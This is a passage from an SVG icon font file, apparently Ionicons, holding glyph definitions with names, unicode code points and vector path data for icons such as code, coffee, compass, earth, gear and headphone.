c-6 0 -12 2 -17 7l-112 112c-9 9 -9 25 0 34l112 112c9 9 25 9 34 0s9 -25 0 -34l-95 -95l95 -95c9 -9 9 -25 0 -34c-5 -5 -11 -7 -17 -7zM312 56c-6 0 -12 2 -17 7c-9 9 -9 25 0 34l95 95l-95 95c-9 9 -9 25 0 34s25 9 34 0l112 -112c9 -9 9 -25 0 -34l-112 -112
c-5 -5 -11 -7 -17 -7z" />
    <glyph glyph-name="ion-code-working" unicode="&#xf270;" 
d="M128 192c0 16 8 24 24 24s24 -8 24 -24s-8 -24 -24 -24s-24 8 -24 24zM200 192c0 16 8 24 24 24s24 -8 24 -24s-8 -24 -24 -24s-24 8 -24 24zM272 192c0 16 8 24 24 24s24 -8 24 -24s-8 -24 -24 -24s-24 8 -24 24zM136 56c-7 0 -12 2 -17 7l-112 112c-5 5 -7 10 -7 17
s2 12 7 17l112 112c5 5 10 7 17 7s12 -2 17 -7s7 -10 7 -17s-2 -12 -7 -17l-95 -95l95 -95c5 -5 7 -10 7 -17s-2 -12 -7 -17s-10 -7 -17 -7zM312 56c-7 0 -12 2 -17 7s-7 10 -7 17s2 12 7 17l95 95l-95 95c-5 5 -7 10 -7 17s2 12 7 17s10 7 17 7s12 -2 17 -7l112 -112
c5 -5 7 -10 7 -17s-2 -12 -7 -17l-112 -112c-5 -5 -10 -7 -17 -7z" />
    <glyph glyph-name="ion-code" unicode="&#xf271;" 
d="M136 56c-6 0 -12 2 -17 7l-112 112c-9 9 -9 25 0 34l112 112c9 9 25 9 34 0s9 -25 0 -34l-95 -95l95 -95c9 -9 9 -25 0 -34c-5 -5 -11 -7 -17 -7zM312 56c-6 0 -12 2 -17 7c-9 9 -9 25 0 34l95 95l-95 95c-9 9 -9 25 0 34s25 9 34 0l112 -112c9 -9 9 -25 0 -34l-112 -112
c-5 -5 -11 -7 -17 -7z" />
    <glyph glyph-name="ion-coffee" unicode="&#xf272;" horiz-adv-x="384" 
d="M319 191c37 -7 65 -40 65 -79c0 -20 -8 -39 -21 -54c-15 -17 -37 -26 -61 -26c-8 0 -17 1 -25 3c-6 1 -10 3 -15 5c-11 -15 -23 -25 -32 -33v0c-5 -5 -12 -7 -19 -7h-102c-7 0 -14 2 -19 7v0c-17 15 -41 36 -62 86s-28 91 -28 111s3 20 16 20h101c-5 17 -37 19 -37 46
c0 17 15 32 28 37c-2 -8 -3 -14 -3 -21c0 -19 39 -30 39 -53c0 -3 0 -6 -1 -9h56c1 5 2 10 2 14c0 36 -56 36 -56 84c0 28 21 55 47 62c-4 -14 -9 -23 -9 -35c0 -32 57 -50 57 -88c0 -13 -5 -25 -12 -37h76c13 0 16 0 16 -20c0 -4 0 -8 -1 -13zM302 64c33 0 50 25 50 48
s-17 43 -39 47c-4 -19 -11 -42 -21 -66c-4 -9 -8 -17 -12 -25c6 -3 13 -4 22 -4z" />
    <glyph glyph-name="ion-compass" unicode="&#xf273;" 
d="M224 416c124 0 224 -100 224 -224s-100 -224 -224 -224s-224 100 -224 224c0 39 10 76 27 108c-16 12 -27 30 -27 52c0 35 29 64 64 64c22 0 40 -11 52 -27c32 17 69 27 108 27zM32 352c0 -10 5 -20 13 -26c13 17 28 32 45 45c-6 8 -16 13 -26 13c-18 0 -32 -14 -32 -32z
M360 56c36 36 56 85 56 136s-20 100 -56 136s-85 56 -136 56s-100 -20 -136 -56s-56 -85 -56 -136s20 -100 56 -136s85 -56 136 -56s100 20 136 56zM320 320c0 0 -54 -130 -72 -152s-120 -104 -120 -104s54 132 72 152s120 104 120 104z" />
    <glyph glyph-name="ion-compose" unicode="&#xf12c;" horiz-adv-x="384" 
d="M379 348c7 -7 7 -18 0 -25l-32 -31l-55 55l31 32c7 7 18 7 25 0zM282 338l55 -55l-177 -173l-64 -14l14 64zM320 192l32 32v-201c0 -13 -10 -23 -23 -23h-306c-13 0 -23 10 -23 23v306c0 13 10 23 23 23h201l-32 -32h-149c-6 0 -11 -5 -11 -10v-268s4 -10 10 -10h269
s9 5 9 10v150z" />
    <glyph glyph-name="ion-connection-bars" unicode="&#xf274;" horiz-adv-x="352" 
d="M0 32v64h64v-64h-64zM96 32v128h64v-128h-64zM192 32v224h64v-224h-64zM288 32v320h64v-320h-64z" />
    <glyph glyph-name="ion-contrast" unicode="&#xf275;" 
d="M224 416c124 0 224 -100 224 -224s-100 -224 -224 -224s-224 100 -224 224s100 224 224 224zM360 56c36 36 56 85 56 136s-20 100 -56 136s-85 56 -136 56v-384c51 0 100 20 136 56z" />
    <glyph glyph-name="ion-crop" unicode="&#xf3c1;" 
d="M320 -32v48h64v-48h-64zM384 96h64v-64h-384v256h-64v64h64v64h64v-320h192v192h-176v64h240v-256z" />
    <glyph glyph-name="ion-cube" unicode="&#xf318;" 
d="M435 280c7 0 13 -6 13 -12v-183c0 -9 -6 -17 -14 -22v-1l-175 -92v-1c-2 -1 -4 -1 -6 -1c-7 0 -13 6 -13 12v185c0 9 5 17 13 22v0l3 2l172 89l2 1c2 1 3 1 5 1zM422 329c0 0 8 -3 8 -9c0 -7 -8 -11 -8 -11l-183 -97l-2 -1c-4 -2 -8 -3 -13 -3s-9 1 -13 3l-2 1l-183 96
s-8 5 -8 12c0 6 8 9 8 9l181 82s11 5 17 5s17 -5 17 -5zM195 187c8 -5 13 -13 13 -22v-185c0 -6 -6 -12 -13 -12c-2 0 -4 1 -6 2v0l-175 92v1c-8 5 -14 13 -14 22v183c0 6 6 12 13 12c2 0 4 0 5 -1l2 -1l171 -89z" />
    <glyph glyph-name="ion-disc" unicode="&#xf12d;" 
d="M224 289c54 0 97 -43 97 -97s-43 -97 -97 -97s-97 43 -97 97s43 97 97 97zM224 148c24 0 44 20 44 44s-20 44 -44 44s-44 -20 -44 -44s20 -44 44 -44zM224 416c124 0 224 -100 224 -224s-100 -224 -224 -224s-224 100 -224 224s100 224 224 224zM224 69
c68 0 123 55 123 123s-55 123 -123 123s-123 -55 -123 -123s55 -123 123 -123z" />
    <glyph glyph-name="ion-document-text" unicode="&#xf12e;" horiz-adv-x="288" 
d="M286 279c1 -3 2 -6 2 -10v-245c0 -13 -10 -24 -22 -24h-243c-12 0 -23 11 -23 24v336c0 13 11 24 23 24h160c3 0 6 0 9 -2c2 -1 5 -3 7 -5l84 -92c2 -2 2 -4 3 -6zM48 269v-10c0 -1 1 -3 3 -3h71c2 0 3 2 3 3v10c0 2 -1 3 -3 3h-71c-2 0 -3 -1 -3 -3zM48 141v-10
c0 -1 1 -3 3 -3h123c2 0 2 2 2 3v10c0 2 0 3 -2 3h-123c-2 0 -3 -1 -3 -3zM208 67v10c0 2 0 3 -2 3h-155c-2 0 -3 -1 -3 -3v-10c0 -1 1 -3 3 -3h155c2 0 2 2 2 3zM240 195v10c0 2 0 3 -2 3h-187c-2 0 -3 -1 -3 -3v-10c0 -1 1 -3 3 -3h187c2 0 2 2 2 3zM193 270h60l-71 78
v-66c0 -6 5 -12 11 -12z" />
    <glyph glyph-name="ion-document" unicode="&#xf12f;" horiz-adv-x="288" 
d="M287 279c1 -3 1 -5 1 -9v-244c0 -13 -9 -26 -21 -26h-243c-12 0 -24 13 -24 26v335c0 13 12 23 24 23h160c3 0 6 0 9 -2c2 -1 5 -2 7 -4l83 -92c2 -2 3 -4 4 -7zM193 337v-63h58zM32 32h224v210h-67c-15 0 -28 13 -28 28v82h-129v-320z" />
    <glyph glyph-name="ion-drag" unicode="&#xf130;" horiz-adv-x="512" 
d="M0 272v32h512v-32h-512zM0 176v32h512v-32h-512zM0 80v32h512v-32h-512z" />
    <glyph glyph-name="ion-earth" unicode="&#xf276;" 
d="M325 322c2 -4 7 -12 3 -15c-3 -2 -10 -2 -13 5s0 11 -5 9s-7 3 -6 4c1 2 3 3 5 4c0 2 -4 8 2 7c4 -1 12 -10 14 -14zM344 277v0v0zM403 251c0 0 -2 0 0 0v0zM224 416c124 0 224 -100 224 -224s-100 -224 -224 -224s-224 100 -224 224s100 224 224 224zM141 19l8 -4
c3 -1 6 -2 10 -3c14 -5 28 -8 43 -10c28 -3 56 -1 83 8c15 5 30 11 43 20c6 4 6 16 10 24c8 16 -2 33 12 47c12 14 4 19 4 34c0 10 8 18 4 29c-1 4 -7 -3 -9 1c-5 7 -21 1 -28 2c-13 2 -24 14 -33 23c-5 5 0 20 1 26c4 15 0 33 19 38c5 1 5 9 10 11c5 1 10 3 15 4
c9 1 17 -2 26 -2c10 0 14 -5 22 -11c7 -6 13 -3 22 -5c7 0 0 5 -2 8c-3 2 -6 2 -8 2c-16 4 -23 22 -36 30c-6 3 -9 2 -11 0c-1 -1 1 -12 1 -12c-1 -3 -10 -4 -13 -5c-9 -2 -29 17 -15 22c4 1 27 5 24 15c-3 6 2 13 -5 14c-8 1 -7 7 -15 8c-5 1 -5 11 -5 14c0 9 2 6 9 7
c-17 11 -37 19 -57 24c-1 -3 -5 -12 -8 -12c-5 -1 -6 0 -9 -3c-9 -10 -16 -28 -25 -7c-4 11 5 19 2 28h-6h-3c6 -12 -5 -18 -8 -19c-8 0 -10 5 -17 4c-4 -1 -7 4 -11 2s-13 -8 -14 -12c-3 -12 6 -13 14 -6c6 6 17 12 25 6c6 -5 5 -9 5 -14s-1 -18 -9 -16c-4 1 -7 6 -11 3
c-8 -7 -18 -6 -29 -9c-10 -2 -16 -6 -25 -9c-8 -3 -11 -4 -12 -12c0 -2 0 -14 -3 -15c-5 -2 -8 22 -22 20c-12 -1 -30 -13 -25 -28c2 -5 28 -3 10 -14c-2 -1 2 -17 2 -20c1 -8 13 -18 21 -10c6 6 6 5 14 2c15 -8 33 -15 45 -27c6 -6 9 -24 17 -28c9 -5 19 -5 26 -14
c6 -7 -2 -19 -8 -23c-4 -2 -12 -24 -16 -29c-2 -4 -12 -6 -16 -7c-3 0 -7 -9 -9 -11c-7 -7 -8 -13 -17 -19c-18 -12 -22 -23 -18 -44c2 -8 5 -13 11 -16zM100 46l2 -2c7 -6 15 -11 23 -16c-21 21 -23 49 -21 78l3 24c1 3 -4 7 -4 11c0 10 0 5 -8 13c-4 4 -10 11 -12 17
c-7 16 1 30 10 43c9 14 -7 20 -10 32c-1 6 -7 6 -6 12c1 7 -4 5 -9 9c-12 8 -1 20 -7 26c-43 -70 -36 -162 16 -224c1 -1 0 -1 1 -2h1c3 -4 6 -8 9 -11s7 -6 10 -9z" />
    <glyph glyph-name="ion-easel" unicode="&#xf3c2;" 
d="M48 112v192h352v-192h-352zM432 352c9 0 16 -7 16 -16v-256c0 -9 -7 -16 -16 -16h-416c-9 0 -16 7 -16 16v256c0 9 7 16 16 16h416zM416 96v224h-384v-224h384zM48 -32l29 80h31l-28 -80h-32zM239 416l17 -48h-64l17 48h30zM340 48h31l29 -80h-32zM208 0v48h32v-48h-32z
" />
    <glyph glyph-name="ion-edit" unicode="&#xf2bf;" 
d="M381 259l-250 -251l-91 91l251 250zM440 360c12 -12 11 -32 -2 -45l-45 -45l-91 91l45 45c13 13 33 14 45 2zM32 85l85 -85l-117 -32z" />
    <glyph glyph-name="ion-egg" unicode="&#xf277;" horiz-adv-x="320" 
d="M160 416c64 0 160 -133 160 -257s-64 -191 -160 -191s-160 67 -160 191s96 257 160 257z" />
    <glyph glyph-name="ion-eject" unicode="&#xf131;" horiz-adv-x="320" 
d="M303 128h-286v0c-10 0 -17 7 -17 16c0 3 1 5 3 8l138 191c5 5 11 9 19 9s14 -4 19 -9l138 -190c2 -3 3 -6 3 -9c0 -9 -7 -16 -17 -16v0zM308 96c7 0 12 -5 12 -12v-40c0 -7 -5 -12 -12 -12h-296c-7 0 -12 5 -12 12v40c0 7 5 12 12 12h296z" />
    <glyph glyph-name="ion-email-unread" unicode="&#xf3c3;" horiz-adv-x="480" 
d="M352 288c0 43 21 64 64 64s64 -21 64 -64s-21 -64 -64 -64s-64 21 -64 64zM209 288h127c0 -17 5 -33 15 -47c-6 -3 -14 -8 -22 -12s-16 -8 -23 -12s-14 -8 -22 -12s-15 -8 -21 -11s-11 -6 -16 -9s-9 -5 -12 -7s-4 -3 -5 -3c-6 -3 -13 -4 -21 -4s-15 1 -21 4
c-1 1 -15 8 -42 23s-54 29 -81 44s-43 23 -46 25c-7 4 -12 8 -13 11c-1 4 -1 6 1 8s6 2 11 2h191zM277 175c18 11 45 30 83 56c16 -15 34 -23 56 -23v-155c0 -2 -1 -4 -2 -7s-3 -5 -5 -7s-4 -4 -7 -5s-6 -2 -8 -2h-185h-185c-5 0 -11 2 -16 7s-8 9 -8 14v205c0 6 3 8 9 5
c2 -1 11 -7 26 -17s32 -22 53 -36s39 -26 53 -35l-83 -93c-2 -2 -2 -4 -1 -5c2 -1 4 -1 6 1l98 83c16 -10 25 -16 27 -17c6 -3 13 -4 21 -4s15 1 21 4c2 1 11 7 27 17l98 -83c2 -2 5 -2 6 -1s0 3 -2 5z" />
    <glyph glyph-name="ion-email" unicode="&#xf132;" horiz-adv-x="416" 
d="M19 299c-4 2 -11 7 -13 11c-3 8 1 10 12 10h191h191c11 0 15 -2 12 -10c-2 -4 -9 -9 -13 -11c-11 -6 -163 -89 -169 -92s-12 -4 -21 -4s-15 1 -21 4s-158 86 -169 92zM408 295c9 4 8 -1 8 -5v-205c0 -9 -12 -21 -22 -21h-185h-185c-10 0 -24 12 -24 21v205s0 9 9 5
c8 -4 83 -56 132 -88l-83 -93c-2 -2 -2 -4 -1 -5s4 -1 6 1l98 83c15 -10 25 -16 27 -17c8 -4 14 -4 21 -4s13 0 21 4c2 1 12 7 27 17l98 -83c2 -2 5 -2 6 -1s0 3 -2 5l-82 93c49 32 123 84 131 88z" />
    <glyph glyph-name="ion-erlenmeyer-flask-bubbles" unicode="&#xf3c4;" horiz-adv-x="384" 
d="M382 21c2 -4 3 -10 0 -14s-8 -7 -13 -7h-177h-178c-5 0 -9 3 -12 7s-2 10 0 14l118 199v150c0 8 6 14 14 14s15 -6 15 -14v-80c4 3 10 5 16 5c15 0 27 -12 27 -27s-12 -26 -27 -26c-6 0 -12 2 -16 5v-31c0 -2 -1 -4 -2 -6l-35 -59h72c-15 6 -26 20 -26 37
c0 23 19 42 43 42c15 0 27 -8 35 -19c-1 2 -1 3 -1 5v154c0 8 6 14 14 14s15 -6 15 -14v-150zM218 151h53l-31 54c2 -5 3 -11 3 -17c0 -17 -10 -31 -25 -37zM201 319c-12 0 -22 9 -22 21s10 21 22 21s22 -9 22 -21s-10 -21 -22 -21z" />
    <glyph glyph-name="ion-erlenmeyer-flask" unicode="&#xf3c5;" horiz-adv-x="384" 
d="M375 52c6 -9 9 -20 9 -32c0 -28 -16 -52 -63 -52h-258c-47 0 -63 24 -63 52c0 12 3 23 9 32l49 73l49 77c13 20 21 44 21 70v92s-14 34 -16 43c-2 8 1 9 17 9h126c16 0 18 -1 16 -9c-2 -9 -15 -22 -15 -42v-93c0 -26 6 -50 19 -70zM345 7c3 3 7 8 7 14c0 5 -2 10 -4 14
l-101 150c-16 26 -23 56 -23 87v112h-64v-112c0 -32 -9 -62 -25 -87l-99 -150c-2 -4 -4 -9 -4 -14c0 -6 3 -11 6 -14c4 -4 12 -7 25 -7h258c13 0 20 3 24 7zM325 37c1 -2 3 -6 3 -8c0 -7 -6 -15 -14 -15h-244c-7 0 -14 6 -14 14c0 3 1 6 3 8l81 124h103l82 -124v1zM238 106
c2 -1 4 -2 6 -2s3 0 5 2c1 2 3 4 3 6s-1 4 -3 6c-1 2 -3 2 -5 2s-4 0 -6 -2c-1 -2 -2 -4 -2 -6s0 -4 2 -6zM285 47c4 2 4 7 2 11l-23 36c-1 2 -4 4 -7 4c-2 0 -3 0 -4 -1c-4 -2 -4 -7 -2 -11l23 -36c1 -2 5 -4 7 -4c1 0 3 0 4 1z" />
    <glyph glyph-name="ion-eye-disabled" unicode="&#xf306;" 
d="M344 290c41 -27 76 -66 104 -100c-51 -54 -124 -135 -224 -135c-36 0 -65 8 -92 22l-77 -77l-23 23l71 71c-36 25 -68 61 -103 98c78 85 142 137 224 137c34 0 64 -9 92 -23l77 78l23 -23zM134 192c0 -19 6 -36 16 -51l27 27c-4 7 -5 15 -5 24c0 29 23 53 52 53h8
c-5 -6 -8 -13 -8 -21c0 -3 0 -5 1 -8l51 50c-15 11 -33 17 -52 17c-49 0 -90 -41 -90 -91zM224 101c49 0 90 41 90 91c0 19 -6 37 -16 52l-50 -51c3 -1 5 -1 8 -1c8 0 14 3 20 7v-7c0 -29 -23 -53 -52 -53c-9 0 -17 2 -24 6l-28 -27c15 -11 33 -17 52 -17z" />
    <glyph glyph-name="ion-eye" unicode="&#xf133;" 
d="M224 320c99 0 172 -70 224 -129c-51 -50 -124 -127 -224 -127s-157 60 -224 128c78 79 142 128 224 128zM224 101c49 0 90 41 90 91s-41 91 -90 91s-90 -41 -90 -91s41 -91 90 -91zM224 224c0 -18 14 -32 32 -32c8 0 14 3 20 7v-7c0 -29 -23 -53 -52 -53s-52 24 -52 53
s23 53 52 53h8c-5 -6 -8 -13 -8 -21z" />
    <glyph glyph-name="ion-female" unicode="&#xf278;" horiz-adv-x="256" 
d="M160 164v-68h64v-64h-64v-64h-64v64h-64v64h64v68c-55 14 -96 64 -96 124c0 71 57 128 128 128s128 -57 128 -128c0 -60 -41 -110 -96 -124zM128 208c44 0 80 36 80 80s-36 80 -80 80s-80 -36 -80 -80s36 -80 80 -80z" />
    <glyph glyph-name="ion-filing" unicode="&#xf134;" horiz-adv-x="384" 
d="M317 319c12 0 19 0 19 -20v-28h-288v28c0 20 8 20 20 20h249zM269 352c13 0 19 -1 19 -19h-192c0 18 7 19 20 19h153zM368 278c13 -8 17 -17 15 -41l-17 -184c-4 -21 -16 -21 -24 -21h-300c-8 0 -20 0 -24 21l-17 185c-3 26 1 31 15 40l15 10v-32h321v32z" />
    <glyph glyph-name="ion-film-marker" unicode="&#xf135;" horiz-adv-x="416" 
d="M400 240c9 0 16 -7 16 -15v-210c0 -8 -7 -15 -16 -15h-384c-9 0 -16 7 -16 15v210c0 8 6 14 13 15c-2 2 -3 4 -4 7l-9 45c-2 8 5 16 13 18l370 74c8 2 16 -4 18 -12l9 -46c2 -8 -4 -16 -12 -18l-342 -68h344zM257 46l-20 58l51 36h-62l-20 58l-19 -58h-63l51 -36l-19 -58
l50 36z" />
    <glyph glyph-name="ion-fireball" unicode="&#xf319;" horiz-adv-x="320" 
d="M297 210c14 -24 23 -52 23 -82c0 -33 -10 -63 -26 -88v0v0c-29 -43 -78 -72 -134 -72c-17 0 -32 1 -46 7s-25 13 -33 25c-11 16 -17 28 -21 52c-6 -25 2 -48 9 -60c-43 26 -69 71 -69 125v4c5 78 65 109 90 151c8 14 13 30 10 48c11 -9 15 -25 15 -39
c0 -16 -3 -29 -3 -29c4 8 7 18 9 31c6 35 2 85 -37 132l-1 1s7 0 18 -3c95 -16 169 -91 184 -186c2 -12 3 -23 3 -35c0 -16 -2 -32 -5 -47c10 23 13 43 14 55v10z" />
    <glyph glyph-name="ion-flag" unicode="&#xf279;" horiz-adv-x="384" 
d="M362 266c0 0 12 2 22 6c0 -16 -7 -32 -9 -36c-28 -50 -99 -123 -181 -84c-65 31 -92 30 -117 24c-1 0 -2 -1 -3 -1c-3 -1 -15 -5 -26 -1v197c0 16 14 31 33 35c39 7 106 5 148 -74c39 -74 97 -72 133 -66zM24 416c4 0 8 -4 8 -8v-432c0 -4 -4 -8 -8 -8h-16
c-4 0 -8 4 -8 8v432c0 4 4 8 8 8h16z" />
    <glyph glyph-name="ion-flame" unicode="&#xf31a;" horiz-adv-x="256" 
d="M1 128c-11 109 72 224 159 288c-26 -145 97 -142 96 -288c-1 -120 -105 -160 -128 -160s-114 26 -127 160zM88 80c0 -44 40 -80 40 -80s41 36 41 80s-41 80 -41 80s-40 -36 -40 -80z" />
    <glyph glyph-name="ion-flash-off" unicode="&#xf136;" 
d="M115 -4c-69 38 -115 112 -115 196c0 124 100 224 224 224c24 0 47 -4 68 -11c2 -1 3 -1 5 -2c12 -4 24 -9 35 -15v0c69 -38 116 -112 116 -196c0 -124 -100 -224 -224 -224c-24 0 -47 4 -68 11c-2 1 -3 1 -5 2c-12 4 -24 8 -35 14zM86 291c-20 -28 -32 -62 -32 -99
c0 -65 36 -121 90 -150c6 -3 13 -7 19 -9c2 -1 3 -1 5 -2c9 -3 19 -5 29 -7c9 -2 18 -2 27 -2c37 0 71 12 99 32l-52 53l36 40l55 -54c20 28 32 62 32 99c0 66 -37 123 -91 151c-6 3 -12 6 -18 8c-2 1 -3 1 -5 2c-9 3 -19 5 -29 7c-9 2 -18 2 -27 2c-37 0 -72 -12 -100 -32
l53 -52l-36 -41zM178 58l38 113h-85l139 155l-38 -113h85z" />
    <glyph glyph-name="ion-flash" unicode="&#xf137;" horiz-adv-x="320" 
d="M0 160l224 256l-51 -192h147l-224 -256l51 192h-147z" />
    <glyph glyph-name="ion-folder" unicode="&#xf139;" horiz-adv-x="384" 
d="M366 256c18 0 19 -7 18 -18l-12 -186c-1 -11 -3 -20 -21 -20h-317c-18 0 -20 9 -21 20l-13 184c-1 11 0 20 18 20h348zM362 305l2 -33h-344c0 6 4 46 6 63c2 18 8 17 25 17h75c28 0 23 0 37 -15c16 -18 19 -17 41 -17h143c11 0 15 -3 15 -15z" />
    <glyph glyph-name="ion-fork-repo" unicode="&#xf2c0;" horiz-adv-x="320" 
d="M320 368v-64h-48v-48h-64v48h-48v64h48v48h64v-48h48zM208 208h64v-5v0c0 -43 -7 -70 -38 -95c-23 -19 -51 -20 -75 -22c-9 -1 -18 -2 -26 -3c-6 -1 -13 -5 -20 -10c9 -11 15 -25 15 -41c0 -35 -29 -64 -64 -64s-64 29 -64 64c0 24 13 44 32 55v210c-19 11 -32 31 -32 55
c0 35 29 64 64 64s64 -29 64 -64c0 -24 -13 -44 -32 -55v-160c8 4 18 7 27 9c11 2 21 2 31 3c17 1 33 3 40 9c10 8 14 11 14 50zM64 384c-18 0 -32 -14 -32 -32s14 -32 32 -32s32 14 32 32s-14 32 -32 32zM64 0c18 0 32 14 32 32s-14 32 -32 32s-32 -14 -32 -32
s14 -32 32 -32z" />
    <glyph glyph-name="ion-fork" unicode="&#xf27a;" horiz-adv-x="128" 
d="M78 299v0v0v0zM128 282c0 -26 -15 -48 -37 -58c-12 -6 -11 -11 -11 -11s16 -200 16 -213s-3 -18 -9 -24s-15 -8 -23 -8v0v0c-8 0 -16 2 -22 8s-10 13 -10 24s16 213 16 213s0 6 -11 11c-22 10 -37 32 -37 58c0 43 15 93 24 134h8v-117c0 -6 3 -11 9 -11s9 4 10 10v1
l9 117h8l10 -117v-1c1 -6 3 -10 9 -10s9 5 9 11v117h8v0c9 -40 24 -91 24 -134z" />
    <glyph glyph-name="ion-forward" unicode="&#xf13a;" horiz-adv-x="384" 
d="M224 150c-102 0 -171 -9 -224 -102c0 0 37 208 224 208v80l160 -144l-160 -134v92z" />
    <glyph glyph-name="ion-funnel" unicode="&#xf31b;" 
d="M224 416c124 0 224 -36 224 -80c0 -8 -3 -15 -9 -22v0c-35 -43 -151 -179 -151 -218v-4v-83v0c0 -23 -29 -41 -64 -41s-64 18 -64 41v0v87c0 39 -117 177 -149 216v0c-7 8 -11 16 -11 24c0 44 100 80 224 80zM224 288c92 0 176 22 176 48s-83 48 -176 48
s-176 -22 -176 -48s84 -48 176 -48z" />
    <glyph glyph-name="ion-gear-a" unicode="&#xf13d;" horiz-adv-x="384" 
d="M347 192c0 -24 15 -43 37 -56c-4 -13 -10 -26 -16 -38c-25 6 -45 -3 -62 -20s-22 -37 -16 -62c-12 -6 -25 -12 -38 -16c-13 22 -36 37 -60 37s-47 -15 -60 -37c-13 4 -27 10 -39 16c6 25 2 45 -15 62s-37 21 -62 15c-6 12 -12 26 -16 39c22 13 37 36 37 60s-15 43 -37 56
c4 13 9 26 16 38c25 -6 45 3 62 20s21 37 15 62c12 6 26 12 39 16c13 -22 36 -37 60 -37s47 15 60 37c13 -4 27 -10 39 -16c-6 -25 -2 -45 15 -62s37 -26 62 -20c6 -12 12 -25 16 -38c-22 -13 -37 -32 -37 -56zM192 94c54 0 98 44 98 98s-44 98 -98 98s-98 -44 -98 -98
s44 -98 98 -98z" />
    <glyph glyph-name="ion-gear-b" unicode="&#xf13e;" horiz-adv-x="384" 
d="M384 154h-44c-4 -14 -10 -27 -17 -39l32 -32l-54 -54l-33 32c-12 -7 -24 -11 -38 -15v-46h-76v46c-13 4 -26 8 -38 15l-33 -32l-54 54l32 32c-7 12 -13 25 -17 39h-44v76h43c4 14 9 29 16 41l-30 30l54 54l29 -29c13 8 27 13 42 17v41h76v-41c15 -4 29 -9 42 -17l29 29
l54 -54l-30 -30c7 -12 13 -27 16 -41h43v-76zM192 138c30 0 54 24 54 54s-24 54 -54 54s-54 -24 -54 -54s24 -54 54 -54z" />
    <glyph glyph-name="ion-grid" unicode="&#xf13f;" horiz-adv-x="320" 
d="M64 295c0 -4 -3 -7 -7 -7h-50c-4 0 -7 3 -7 7v50c0 4 3 7 7 7h50c4 0 7 -3 7 -7v-50zM192 295c0 -4 -3 -7 -7 -7h-50c-4 0 -7 3 -7 7v50c0 4 3 7 7 7h50c4 0 7 -3 7 -7v-50zM320 295c0 -4 -3 -7 -7 -7h-50c-4 0 -7 3 -7 7v50c0 4 3 7 7 7h50c4 0 7 -3 7 -7v-50zM64 167
c0 -4 -3 -7 -7 -7h-50c-4 0 -7 3 -7 7v50c0 4 3 7 7 7h50c4 0 7 -3 7 -7v-50zM192 167c0 -4 -3 -7 -7 -7h-50c-4 0 -7 3 -7 7v50c0 4 3 7 7 7h50c4 0 7 -3 7 -7v-50zM320 167c0 -4 -3 -7 -7 -7h-50c-4 0 -7 3 -7 7v50c0 4 3 7 7 7h50c4 0 7 -3 7 -7v-50zM64 39
c0 -4 -3 -7 -7 -7h-50c-4 0 -7 3 -7 7v50c0 4 3 7 7 7h50c4 0 7 -3 7 -7v-50zM192 39c0 -4 -3 -7 -7 -7h-50c-4 0 -7 3 -7 7v50c0 4 3 7 7 7h50c4 0 7 -3 7 -7v-50zM320 39c0 -4 -3 -7 -7 -7h-50c-4 0 -7 3 -7 7v50c0 4 3 7 7 7h50c4 0 7 -3 7 -7v-50z" />
    <glyph glyph-name="ion-hammer" unicode="&#xf27b;" horiz-adv-x="320" 
d="M314 416c3 0 6 -3 6 -6v-84c0 -3 -3 -6 -6 -6h-52c-3 0 -6 3 -6 6v14c-6 5 -16 9 -22 7c-7 -2 -23 -13 -30 -25s-6 -28 -6 -66l8 -2c5 -1 7 -6 7 -9v-70c0 -95 11 -201 11 -201c0 -3 -3 -6 -6 -6h-84c-3 0 -6 3 -6 6c0 0 11 106 11 201v70c0 3 3 8 7 9l7 2
c0 43 -5 58 -22 74c-18 16 -41 19 -63 17s-51 -35 -58 -45s-10 2 -10 11c1 16 22 60 72 81s91 22 102 22s27 -1 38 -3s16 -18 26 -18c7 0 14 5 18 9v6c0 3 3 6 6 6h52z" />
    <glyph glyph-name="ion-happy-outline" unicode="&#xf3c6;" 
d="M355 158c8 -4 11 -13 7 -21c-24 -46 -78 -73 -138 -73c-62 0 -118 29 -139 74c-4 8 0 17 8 21c2 1 5 1 7 1c6 0 11 -3 14 -9c16 -34 60 -55 110 -55c49 0 92 21 110 56c3 5 8 8 14 8c3 0 5 -1 7 -2zM381 217c5 -7 4 -17 -4 -22c-3 -2 -6 -3 -10 -3c-5 0 -11 2 -14 6
s-7 10 -17 10s-14 -6 -17 -10s-9 -6 -14 -6c-4 0 -7 1 -10 3c-8 6 -9 15 -3 22c11 14 23 23 44 23s35 -9 45 -23zM157 217c5 -7 4 -17 -4 -22c-3 -2 -6 -3 -10 -3c-5 0 -11 2 -14 6s-7 10 -17 10s-14 -6 -17 -10s-9 -6 -14 -6c-4 0 -7 1 -10 3c-8 6 -9 15 -3 22
c11 14 23 23 44 23s35 -9 45 -23zM224 416c124 0 224 -100 224 -224s-100 -224 -224 -224s-224 100 -224 224s100 224 224 224zM360 56c36 36 56 85 56 136s-20 100 -56 136s-85 56 -136 56s-100 -20 -136 -56s-56 -85 -56 -136s20 -100 56 -136s85 -56 136 -56
s100 20 136 56z" />
    <glyph glyph-name="ion-happy" unicode="&#xf31c;" 
d="M224 416c124 0 224 -100 224 -224s-100 -224 -224 -224s-224 100 -224 224s100 224 224 224zM71 195c3 -2 6 -3 10 -3c5 0 11 2 14 6s7 10 17 10s14 -6 17 -10s9 -6 14 -6c4 0 7 1 10 3c8 5 9 15 4 22c-10 14 -24 23 -45 23s-33 -9 -44 -23c-6 -7 -5 -16 3 -22zM362 137
c4 8 1 17 -7 21c-2 1 -4 2 -7 2c-6 0 -11 -3 -14 -8c-18 -35 -61 -56 -110 -56c-50 0 -94 21 -110 55c-3 6 -8 9 -14 9c-2 0 -5 0 -7 -1c-8 -4 -12 -13 -8 -21c21 -45 77 -74 139 -74c60 0 114 27 138 73zM377 195c8 5 9 15 4 22c-10 14 -24 23 -45 23s-33 -9 -44 -23
c-6 -7 -5 -16 3 -22c3 -2 6 -3 10 -3c5 0 11 2 14 6s7 10 17 10s14 -6 17 -10s9 -6 14 -6c4 0 7 1 10 3z" />
    <glyph glyph-name="ion-headphone" unicode="&#xf140;" horiz-adv-x="384" 
d="M383 210c3 -51 -3 -130 -13 -162c-20 -67 -40 -80 -72 -80s-58 27 -58 59v106c0 33 23 59 53 59c18 0 34 -9 44 -24c0 0 11 7 13 22s4 34 -5 64s-21 19 -36 38c-2 3 -5 7 -8 10l-10 10c-2 2 -3 3 -5 4c-11 9 -21 17 -34 23c-19 9 -39 13 -60 13s-42 -4 -61 -13
